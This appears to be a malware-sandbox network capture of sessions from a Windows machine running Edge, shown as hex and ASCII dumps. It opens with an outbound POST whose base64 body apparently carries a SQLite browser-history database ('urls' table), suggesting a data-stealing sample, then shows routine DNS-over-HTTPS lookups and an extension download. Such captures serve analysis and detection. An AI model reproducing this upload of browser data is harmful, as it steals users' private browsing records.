                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                2024-12-16 12:47:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:18 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                18192.168.2.849782172.64.41.34437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:17 GMT
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                CF-RAY: 8f2ec7f7c8a04271-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom'Hc)


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                19192.168.2.849773172.64.41.34437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:17 GMT
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                CF-RAY: 8f2ec7f7f939c34e-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)Pc)


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                20192.168.2.849783172.64.41.34437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:17 GMT
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                CF-RAY: 8f2ec7f7fa19330c-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                21192.168.2.849785172.64.41.34437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                22192.168.2.849786172.64.41.34437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                23192.168.2.849787172.64.41.34437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                2024-12-16 12:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                24192.168.2.849775172.217.19.2254437920C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Content-Length: 154477
                                                                                                                                                                                                                                                                X-GUploader-UploadID: AFiumC63VOvQiPFpJWwc9IcQDmFYDJbx2ZYKPk_7CoPD8sbhxpQYBVt93n1xgAFt1IxysaIT
                                                                                                                                                                                                                                                                X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                                                Date: Sun, 15 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                Expires: Mon, 15 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                Age: 74944
                                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                2024-12-16 12:47:18 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
